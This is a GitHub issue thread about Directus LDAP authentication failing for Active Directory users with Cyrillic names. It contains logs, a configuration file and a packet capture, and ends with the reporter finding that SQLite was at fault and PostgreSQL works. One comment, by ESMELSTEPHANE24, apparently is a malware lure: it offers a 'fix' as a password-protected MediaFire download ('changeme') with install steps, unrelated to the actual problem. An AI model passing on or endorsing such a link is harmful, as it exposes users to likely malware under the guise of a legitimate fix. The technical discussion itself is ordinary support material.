### ISSUE TITLE
LDAP autorization dosn't work

### ISSUE THREAD

**Issue by Yurash73** [directus/directus#23495]
### Describe the Bug

Hi!
Try to autorized using LDAP with AD users.
If name and surname  by english is ok.
But in my AD use cyrilic in name.
When I firstly login by LDAp user I get Unexpected error, but user in Directus created and have an Extrenal Identifier with cyrilic symbols:
`CN=Имя Фамилия,CN=Users,DC=corp,DC=company`
and fields First name, Last name and email fiilled from AD.
Then I try to login in second time get :"User belongs to a different auth provider" in web-page and log below

```
directus-1  | [06:43:05.293] WARN: [LDAP] Failed to register user. User not unique
directus-1  |     err: {
directus-1  |       "type": "",
directus-1  |       "message": "Value for field \"email\" in collection \"directus_users\" has to be unique.",
directus-1  |       "stack":
directus-1  |           DirectusError: Value for field "email" in collection "directus_users" has to be unique.
directus-1  |               at UsersService.checkUniqueEmails (file:///directus/node_modules/.pnpm/@directus+api@file+api_@types+node@18.19.33_@unhead+vue@1.9.9_vue@3.4.27_typescript@5.4.5___e_uxukeaxp3oag7q6k2bw7bwweqe/node_modules/@directus/api/dist/services/users.js:55:19)
directus-1  |               at async UsersService.createOne (file:///directus/node_modules/.pnpm/@directus+api@file+api_@types+node@18.19.33_@unhead+vue@1.9.9_vue@3.4.27_typescript@5.4.5___e_uxukeaxp3oag7q6k2bw7bwweqe/node_modules/@directus/api/dist/services/users.js:165:17)
directus-1  |               at async LDAPAuthDriver.getUserID (file:///directus/node_modules/.pnpm/@directus+api@file+api_@types+node@18.19.33_@unhead+vue@1.9.9_vue@3.4.27_typescript@5.4.5___e_uxukeaxp3oag7q6k2bw7bwweqe/node_modules/@directus/api/dist/auth/drivers/ldap.js:227:13)
directus-1  |               at async AuthenticationService.login (file:///directus/node_modules/.pnpm/@directus+api@file+api_@types+node@18.19.33_@unhead+vue@1.9.9_vue@3.4.27_typescript@5.4.5___e_uxukeaxp3oag7q6k2bw7bwweqe/node_modules/@directus/api/dist/services/authentication.js:44:22)
directus-1  |               at async file:///directus/node_modules/.pnpm/@directus+api@file+api_@types+node@18.19.33_@unhead+vue@1.9.9_vue@3.4.27_typescript@5.4.5___e_uxukeaxp3oag7q6k2bw7bwweqe/node_modules/@directus/api/dist/auth/drivers/ldap.js:317:56
directus-1  |       "name": "DirectusError",
directus-1  |       "extensions": {
directus-1  |         "collection": "directus_users",
directus-1  |         "field": "email"
directus-1  |       },
directus-1  |       "code": "RECORD_NOT_UNIQUE",
directus-1  |       "status": 400
```

I think Directus use distinguishedName as External Identifier in AD and cyrylic symbols in CN are reason of error.
May be I can use other AD parameter as External Identifier?

Variable `AUTH_<PROVIDER>_IDENTIFIER_KEY` is acceptable in LDAP ?

### To Reproduce

File with variables:

```
AUTH_PROVIDERS="ldap"
AUTH_LDAP_DRIVER="ldap"
AUTH_LDAP_CLIENT_URL="ldap://x.x.x.x"
AUTH_LDAP_BIND_DN="string:CN=UserForDirectus,CN=Users,DC=corp,,DC=company"
AUTH_LDAP_BIND_PASSWORD="Password"
AUTH_LDAP_USER_DN="string:CN=Users,DC=corp,DC=company"
AUTH_LDAP_USER_SCOPE="sub"
AUTH_LDAP_GROUP_DN="string:CN=Users,DC=corp,DC=company"
AUTH_LDAP_GROUP_SCOPE="sub"
AUTH_LDAP_USER_ATTRIBUTE="sAMAccountName"
```

### Directus Version

10.13.1

### Hosting Strategy

Self-Hosted (Docker Image)

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Yurash73** [comment]
after sniffing packets got result:
Cyrilic Name and Surname
searchResEntry
    objectName: CN=Имя Фамилия,CN=Users,DC=corp,DC=company
    attributes: 3 items
PartialAttributeList item givenName
            type: givenName
            vals: 1 item
                AttributeValue: d09cd0b0d0bad0b5d0b4d0bed0bdd181d0bad0b8d0b920d090d0bbd0b5d0bad181d0b0d0…
English Name:
searchResEntry
    objectName: CN=test,CN=Users,DC=corp,DC=company
    attributes: 3 items
        PartialAttributeList item givenName
            type: givenName
            vals: 1 item
                AttributeValue: test

**Comment by Yurash73** [comment]
SQLite not support cyrilic. Try to use postrge - no problem.
